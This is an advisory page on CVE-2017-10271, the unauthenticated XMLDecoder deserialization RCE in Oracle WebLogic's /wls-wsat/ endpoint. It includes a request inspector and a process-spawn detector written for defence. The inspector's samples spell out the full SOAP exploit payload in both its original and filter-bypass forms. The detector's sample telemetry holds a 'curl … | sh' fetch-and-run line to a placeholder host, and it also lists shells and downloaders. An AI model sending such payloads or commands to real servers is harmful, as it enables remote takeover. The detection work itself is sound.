CVE-2017-10271 — Oracle Corporation WebLogic Server Remote Code Execution Vulnerability

CVE-2017-10271

Oracle WebLogic Server — XMLDecoder Deserialization via WLS-WSAT Component Enables Unauthenticated RCE; Cryptominer and Ransomware Mass Exploitation; Patched October 2017 CPU

What Is Oracle WebLogic Server?

Oracle WebLogic Server is an enterprise Java EE application server used by large organizations for mission-critical business applications — financial services, telecommunications, government, healthcare. WebLogic servers often run with elevated privileges and have direct access to databases, internal networks, and sensitive business data. WebLogic's WS-AT (Web Services Atomic Transaction) component, exposed via the /wls-wsat/ URL path, was the entry point for CVE-2017-10271 and similar deserialization attacks. A compromised WebLogic server typically provides an attacker with access to sensitive application data, connected databases, and internal network segments.

Overview

Actively Exploited. This vulnerability was added to CISA's Known Exploited Vulnerabilities (KEV) Catalog on February 10, 2022. Federal agencies are required to apply mitigations per BOD 22-01.

CVE-2017-10271 is a deserialization vulnerability in the WLS Security component of Oracle WebLogic Server that allows unauthenticated remote code execution. The flaw lies in WebLogic's use of XMLDecoder, the JDK's built-in XML-to-object deserializer, on attacker-controlled XML arriving at the WS-AT (Web Services Atomic Transaction) endpoint under /wls-wsat/. An attacker sends a crafted SOAP request to this endpoint; WebLogic hands the embedded XML to XMLDecoder, which instantiates whatever classes and calls whatever methods the XML names, including a ProcessBuilder that runs an arbitrary command. Oracle patched the flaw in the October 2017 Critical Patch Update. Exploited soon after the patch release for Monero cryptomining and later for ransomware, CVE-2017-10271 became one of the most mass-exploited server-side vulnerabilities of 2017-2018.

Note: Oracle's CVSS vector for this CVE credits only an availability impact (A:H, with C:N/I:N), which is why the base score is 7.5. Real-world exploitation is full unauthenticated RCE, which on the same vector (C:H/I:H/A:H) would score 9.8. This discrepancy in Oracle's CPU scoring for this vulnerability is well known; treat the CVE as critical regardless of the published score.

Affected Versions

WebLogic Version Status
Oracle WebLogic Server 10.3.6.0.0 Vulnerable
Oracle WebLogic Server 12.1.3.0.0 Vulnerable
Oracle WebLogic Server 12.2.1.1.0 Vulnerable
Oracle WebLogic Server 12.2.1.2.0 Vulnerable
All above with October 2017 CPU applied Fixed

Technical Details

Root Cause: XMLDecoder Deserialization in WS-AT Endpoint

CVE-2017-10271 is a deserialization vulnerability (CWE-502) in the WLS Security component of Oracle WebLogic Server. The WS-AT (Web Services Atomic Transaction) endpoints at /wls-wsat/CoordinatorPortType and /wls-wsat/CoordinatorPortType11 accept SOAP messages without authentication. When such a message carries a WorkContext SOAP header, WebLogic hands the header's XML content to Java's XMLDecoder class to turn it back into Java objects, so the sender, not the server, decides which classes are instantiated.

XMLDecoder as a code execution primitive: XMLDecoder is the reading half of the java.beans XMLEncoder/XMLDecoder pair. It does not restore objects from stored field state the way java.io serialization does; it replays the XML as a sequence of instructions: instantiate the class named in a class attribute with the given constructor arguments, then invoke the methods named in the document on the result. Any public class and public method on the classpath is reachable, including java.lang.ProcessBuilder with attacker-chosen arguments followed by a call to start(), or Runtime.getRuntime().exec(). No gadget-chain research is needed. Any code path that feeds attacker-controlled XML to XMLDecoder is therefore equivalent to arbitrary code execution.

Attack mechanics:

  1. The attacker sends an HTTP POST to /wls-wsat/CoordinatorPortType, with no credentials, whose SOAP header carries a crafted XMLDecoder document
  2. The document contains an <object class="java.lang.ProcessBuilder"> element with an argument array holding the shell command and a <void method="start"/> call
  3. WebLogic passes the header to XMLDecoder, which instantiates the ProcessBuilder with those arguments and calls start()
  4. The command runs with the privileges of the WebLogic server process

Relationship to CVE-2017-3506: CVE-2017-3506 (April 2017 CPU) addressed the same XMLDecoder code path, but Oracle's fix left XMLDecoder in place and put a blocklist of XML element names in front of it. CVE-2017-10271 is a bypass of that blocklist: the same endpoint and the same XMLDecoder sink, reached with element names the filter did not cover (public payloads use <void class="..."> where the April fix rejected <object class="...">). Blocklisting element names in front of a deserializer is fragile by construction, and the pattern repeated in later WebLogic deserialization advisories; the durable fix is to stop deserializing untrusted XML with XMLDecoder at all.
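The attack mechanics above, and the element-name bypass just described, are what a WAF or IDS rule has to recognise. The following is an added example written for this page (not code from the page, from Oracle, or from any published tool) of a request-body inspector that matches on what XMLDecoder will actually do, the class attribute and the method attribute, rather than on a particular element name, so the <object> form and the <void> bypass form are caught alike. The sample requests are constructed; the WorkContext header and element layout follow the payload structure described in the text, and the embedded command is a harmless `id`.

```python
"""Inspect SOAP request bodies bound for /wls-wsat/ for XMLDecoder gadget chains.

Added example, not code from the page or from Oracle. The sample requests
below are constructed for illustration.
"""
import re
import xml.etree.ElementTree as ET

# Element names XMLDecoder interprets as instructions. A WS-AT coordinator
# message has no legitimate reason to carry any of them.
XMLDECODER_TAGS = {"java", "object", "void", "new", "array", "class", "method"}
# Classes and methods that turn a deserialization into command execution.
EXEC_CLASSES = {"java.lang.ProcessBuilder", "java.lang.Runtime"}
EXEC_METHODS = {"start", "exec"}
# Last resort for bodies the XML parser rejects.
FALLBACK_RE = re.compile(
    r"java\.beans\.XMLDecoder|java\.lang\.ProcessBuilder|java\.lang\.Runtime", re.I)


def local_name(tag):
    """Drop ElementTree's '{namespace}' prefix so a namespace cannot hide a tag."""
    return tag.rsplit("}", 1)[-1]


def inspect_soap_body(body):
    """Return ('allow' | 'review' | 'block', [reasons]) for one request body."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        if FALLBACK_RE.search(body):
            return "block", ["unparseable XML naming XMLDecoder gadget classes"]
        return "review", ["unparseable XML"]

    reasons, decoder_tags = [], set()
    for el in root.iter():
        name = local_name(el.tag)
        if name in XMLDECODER_TAGS:
            decoder_tags.add(name)
        cls = el.get("class", "")
        if cls == "java.beans.XMLDecoder":
            reasons.append("explicit java.beans.XMLDecoder document in request")
        if cls in EXEC_CLASSES:
            # Keyed on the class attribute, not the element name, so both
            # <object class=...> and the <void class=...> bypass form match.
            reasons.append(f"<{name} class={cls!r}> instantiates a command-execution class")
        if el.get("method") in EXEC_METHODS:
            reasons.append(f"<{name} method={el.get('method')!r}> launches the process")
    if reasons:
        return "block", reasons
    if decoder_tags:
        return "review", [f"XMLDecoder elements present: {sorted(decoder_tags)}"]
    return "allow", []


# Constructed samples. BENIGN is an ordinary WS-AT coordinator call.
BENIGN = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header/>
  <soapenv:Body><wsat:Prepare xmlns:wsat="http://docs.oasis-open.org/ws-tx/wsat/2006/06"/></soapenv:Body>
</soapenv:Envelope>"""


def _payload(element):
    """Build the CVE-2017-10271 payload shape around a harmless command ('id')."""
    return f"""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.8" class="java.beans.XMLDecoder">
        <{element} class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="1">
            <void index="0"><string>id</string></void>
          </array>
          <void method="start"/>
        </{element}>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>"""


OBJECT_PAYLOAD = _payload("object")  # element form named in the attack mechanics
VOID_PAYLOAD = _payload("void")      # element form used by the blocklist bypass

if __name__ == "__main__":
    for label, body in [("benign", BENIGN), ("object", OBJECT_PAYLOAD), ("void", VOID_PAYLOAD)]:
        verdict, why = inspect_soap_body(body)
        print(f"{label:>7}: {verdict} {why}")
```

The three-way verdict is deliberate: a request that merely contains XMLDecoder elements without a recognised execution class goes to review rather than allow, because the gadget classes listed here are the common ones, not the only ones. Running the inspector at the proxy only helps if /wls-wsat/ traffic is actually routed through it; see the remediation section.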

Attack Characteristics

Attribute Detail
Attack Vector Network — HTTP POST to /wls-wsat/
Authentication None required
Endpoint /wls-wsat/CoordinatorPortType[11]
Exploitation Ease Trivial — single HTTP request
Impact RCE as WebLogic process user

Discovery

CVE-2017-10271 was discovered and reported to Oracle; it was patched in the October 2017 CPU. Proof-of-concept exploit code was published within days of the patch, triggering immediate mass exploitation.

Exploitation Context

  • Immediate mass exploitation: Within days of the October 2017 CPU, attackers began mass-scanning for exposed /wls-wsat/ endpoints and deploying Monero cryptocurrency mining software; organizations that did not apply the CPU promptly were compromised at scale
  • Cryptomining wave: The 2017-2018 cryptomining epidemic targeted WebLogic heavily — the combination of server-side Java execution, persistent processes, and powerful hardware made WebLogic servers highly attractive for mining operations; CVE-2017-10271 was the primary initial access vector
  • Ransomware deployment: Criminal groups later incorporated CVE-2017-10271 into ransomware campaigns against enterprise WebLogic deployments, particularly financial institutions and companies with internet-facing WebLogic instances; CISA's KEV entry flags known ransomware use on the strength of these later campaigns
  • Chinese APT exploitation: Nation-state actors attributed to China used CVE-2017-10271 for targeted intrusions against organizations running WebLogic for enterprise applications
  • Persistent exploitation years later: WebLogic deserialization vulnerabilities have a long exploitation tail; organizations running old WebLogic versions, including instances on internal networks that an attacker reaches through lateral movement, remained targets years after the patch
  • CISA KEV (2022): Added February 2022 confirming ongoing active exploitation

Remediation

CISA BOD 22-01 Deadline: August 10, 2022. Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
  1. Apply the Oracle October 2017 Critical Patch Update, or the latest available CPU, to every WebLogic Server instance. Oracle CPUs are quarterly and cumulative for WebLogic, so any later CPU also contains this fix; verify the installed patch level on each server rather than assuming it from the version string.

  2. Block or remove the WLS-WSAT endpoint — if the Web Services Atomic Transaction component is not required, delete or disable it to eliminate the attack surface:

    • Remove /wls-wsat from the WebLogic deployment
    • Or block access to /wls-wsat/* at the web server/firewall level
  3. Do not expose WebLogic listen ports to the internet. The default listen ports (7001 for HTTP, 7002 for SSL) of the admin server and managed servers should never be directly internet-facing; place WebLogic behind a reverse proxy or WAF that forwards only the application paths actually needed. Note that /wls-wsat/ is served on the same listen port as the deployed applications, so a proxy that passes every path through provides no protection on its own.

  4. Monitor for anomalous process creation. Alert when the WebLogic JVM spawns unexpected child processes (sh, bash, cmd.exe, powershell.exe, curl, wget, certutil); a WebLogic server process rarely has a legitimate reason to launch a shell or a download tool, so such an event is a high-confidence indicator of successful exploitation.

  5. Apply the principle of least privilege to WebLogic service accounts — run WebLogic as a non-root / non-SYSTEM service account with minimal OS permissions to limit damage from exploitation.
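Step 4 above describes a detection in words. The following is an added example written for this page (not code from the page or from Oracle) of that detection run over process-creation telemetry. The record schema (host, user, parent_image, parent_cmdline, image, cmdline) is an assumption of the example, chosen to resemble EDR or Sysmon event 1 output; the sample events are constructed, and the JDK paths, hostnames and the 198.51.100.7 address are placeholders.

```python
"""Flag child processes spawned by the WebLogic JVM in process-creation events.

Added example, not code from the page or from Oracle. EVENTS is constructed
sample telemetry in an assumed EDR-style JSON-lines schema; map your own
source (auditd, Sysmon event 1, eBPF exec tracing) onto the same fields.
"""
import json
import ntpath
import posixpath

# Programs a WebLogic server process has essentially no legitimate reason to launch.
SHELLS_AND_DOWNLOADERS = {
    "sh", "bash", "dash", "ksh", "cmd.exe", "powershell.exe",
    "curl", "wget", "certutil.exe", "bitsadmin.exe", "python", "python3", "perl",
}


def basename(path):
    """Basename for either path style; Windows events arrive with backslashes."""
    return ntpath.basename(path) if "\\" in path else posixpath.basename(path)


def is_weblogic_jvm(record):
    """The server JVM is recognisable by its main class on the command line."""
    return "weblogic.Server" in record.get("parent_cmdline", "")


def evaluate(record):
    """Return None, or (severity, message), for one process-creation record."""
    if not is_weblogic_jvm(record):
        return None
    child = basename(record["image"]).lower()
    where = f"{record['user']}@{record['host']}"
    message = f"{where}: WebLogic JVM spawned {child}: {record['cmdline']}"
    if child in SHELLS_AND_DOWNLOADERS:
        return ("high", message)
    # Any other child is still unusual but may be a deployed application's doing.
    return ("low", message)


def scan(lines):
    """Run evaluate() over JSON lines, returning alerts in input order."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        hit = evaluate(json.loads(line))
        if hit:
            alerts.append(hit)
    return alerts


# Constructed sample telemetry, not real captures. Raw string keeps the JSON
# backslash escapes in the Windows paths intact.
EVENTS = r"""
{"host":"wls-prod-01","user":"oracle","parent_image":"/opt/jdk1.8.0_144/bin/java","parent_cmdline":"java -Dweblogic.Name=AdminServer weblogic.Server","image":"/bin/sh","cmdline":"sh -c curl -s http://198.51.100.7/x.sh | sh"}
{"host":"wls-prod-01","user":"root","parent_image":"/usr/sbin/sshd","parent_cmdline":"sshd: admin [priv]","image":"/bin/bash","cmdline":"-bash"}
{"host":"wls-prod-01","user":"oracle","parent_image":"/opt/jdk1.8.0_144/bin/java","parent_cmdline":"java -Dweblogic.Name=ms1 weblogic.Server","image":"/opt/jdk1.8.0_144/bin/java","cmdline":"java -jar /u01/app/report-gen.jar"}
{"host":"WLS-WIN-02","user":"svc_weblogic","parent_image":"C:\\Java\\jdk1.8.0_144\\bin\\java.exe","parent_cmdline":"java.exe -Dweblogic.Name=AdminServer weblogic.Server","image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c whoami"}
"""

if __name__ == "__main__":
    for severity, message in scan(EVENTS.splitlines()):
        print(f"[{severity}] {message}")
```

The parent is identified by the weblogic.Server main class rather than by the java binary's path, because the JDK location varies per install and a detection keyed on a path is easy to miss after an upgrade. The low-severity branch exists so that legitimate but rare child processes surface for baselining without being silently dropped.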

Key Details

Property Value
CVE ID CVE-2017-10271
Vendor / Product Oracle — WebLogic Server
NVD Published 2017-10-19
NVD Last Modified 2025-10-22
CVSS 3.1 Score 7.5
CVSS 3.1 Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Severity HIGH
CWE CWE-502 — Deserialization of Untrusted Data
CISA KEV Added 2022-02-10
CISA KEV Deadline 2022-08-10
Known Ransomware Use Yes

CVSS 3.1 Breakdown

Attack Vector Network
Attack Complexity Low
Privileges Required None
User Interaction None
Scope Unchanged
Confidentiality None
Integrity None
Availability High

Required Action

CISA BOD 22-01 Deadline: 2022-08-10. Apply updates per vendor instructions.

Timeline

Date Event
2017-10-17 Oracle releases October 2017 Critical Patch Update patching CVE-2017-10271 in WebLogic Server WLS Security component
2017-10-19 CVE-2017-10271 published by NVD
2017-10-21 Proof-of-concept exploit published; mass scanning and exploitation begins for Monero cryptomining
2018-01-01 Continued widespread exploitation by multiple criminal and nation-state groups
2022-02-10 Added to CISA Known Exploited Vulnerabilities catalog
2022-08-10 CISA BOD 22-01 remediation deadline